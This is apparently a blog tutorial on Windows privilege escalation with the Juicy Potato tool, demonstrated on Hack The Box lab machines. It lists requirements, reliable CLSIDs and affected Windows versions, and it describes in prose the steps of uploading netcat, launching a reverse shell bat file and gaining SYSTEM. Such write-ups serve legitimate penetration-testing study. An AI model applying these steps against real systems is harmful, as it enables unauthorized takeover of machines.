WINDOW PRIVILEGE ESCALATION
Impersonating Privileges with Juicy Potato
Windows Privilege Escalation with SeImpersonatePrivilege, and SeAssignPrimaryTokenPrivilege
Today, I am going to talk about a Windows privilege escalation tool called Juicy Potato. In the past, I used it on Hack The box older machines: Bounty, Jeeves, and Conceal to escalate my privileges from a local user to an Administrator. 🔥
Juicy Potato is a local privilege escalation tool created by Andrea Pierini and Giuseppe Trotta to exploit Windows service accounts’ impersonation privileges.
The tool takes advantage of the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled on the machine to elevate the local privileges to System. Normally, these privileges are assigned to service users, admins, and local systems — high integrity elevated users.
If the machine is running IIS or SQL services, these privileges will be enabled by default.
🔧$_Attack_Requirements :
There are few requirements needed for Juicy Potato to work:
1- User account usually a service account with the impersonation privileges of SeImpersonatePrivilege or/and SeAssignPrimaryTokenPrivilege enabled.
2- A COM server with a unique CLSID. The authors of juicy Potato compiled lists of unique CLSIDs for different Windows versions to abuse — http://ohpe.it/juicy-potato/CLSID/.
📎A COM server is an executable (EXE or DLL) that implements a set of COM objects. Windows components are implemented as COM objects and follow standard COM rules to communicate with one another. COM servers are registered in the Registry and have a Class ID (CLSID) and an APPID — winaero
📝 CLSID is a globally unique identifier that identifies a COM object.
In all of the machines I used this tool on, I found the CLSIDs of Wuauserv, Wsearch, XblGameSave and BITS services (COM components) are reliable to escalate the privileges to NT AUTHORITY\SYSTEM.
- Wuauserv for Windows Updates
- WSearch for Windows Search
- XblGameSave for Sync and Upload Xbox Live Save Games
- BITS (Background Intelligent Transfer Service) for uploading and downloading files from/to HTTP web servers and SMB file shares.
3- A listening port in which the attacker listens to.
4- Target IP address monitored by the COM component, usually the attacker’s IP address
5- Path for the process to launch; a stand-alone executable path of netcat or msfvenom reverse shell or a script
$_Affected_Windows_Verisons
- Windows_10_Enterprise
- Windows_10_Pro
- Windows_7_Enterprise
- Windows_8.1_Enterprise
- Windows_Server_2008_R2_Enterprise
- Windows_Server_2012_Datacenter
📌 Juicy Potato does not work for Windows Server 2019 and Windows 10 versions 1809 and higher.
However, there is another technique called PrintSpoofer for abusing these versions introduced by it4mn. https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ . Will go over it in another tutorial 😃
😈$_Escalation_Demo
For the demo, I am going to use the Jeeves machine to run Juicy Potato on. As we see in the screenshot below, we have a shell running as — Kohsuke, and the SeImpersonatePrivilege is enabled.
To escalate, we need to upload the Juicy Potato executable to the compromised machine. A compiled version is available at the tool’s GitHub account https://github.com/ohpe/juicy-potato/releases.
To run the tool, we need a port number for the COM server and a valid CLSID — you can either use the provided list by the tool authors based on the version of the system or run the below PowerShell command to extract the CLSID of the current system.
Save the Powershell code in a file and run it. Save the output in a file.
Upload netcat to the compromised machine and create a bat file that executes a reverse shell.
Run the tool and pass it a listening port (-l), same as the one in the bat file, CLSID from the extracted list (-c), and the path to the bat script (-p).
Open another tab and start the netcat listener on the selected port. In this case, it is 9003.
As we see a process was created with the selected CLSID that has an elevated system privileges 😃
📌Note: you might have to try multiple CLSIDs to get the right one that creates the needed process.
That’s all for today 😃. Thanks for stopping by …
💡Quick Cheat sheet for all of the used commands in this tutorial at Notion — R3b-buck3t
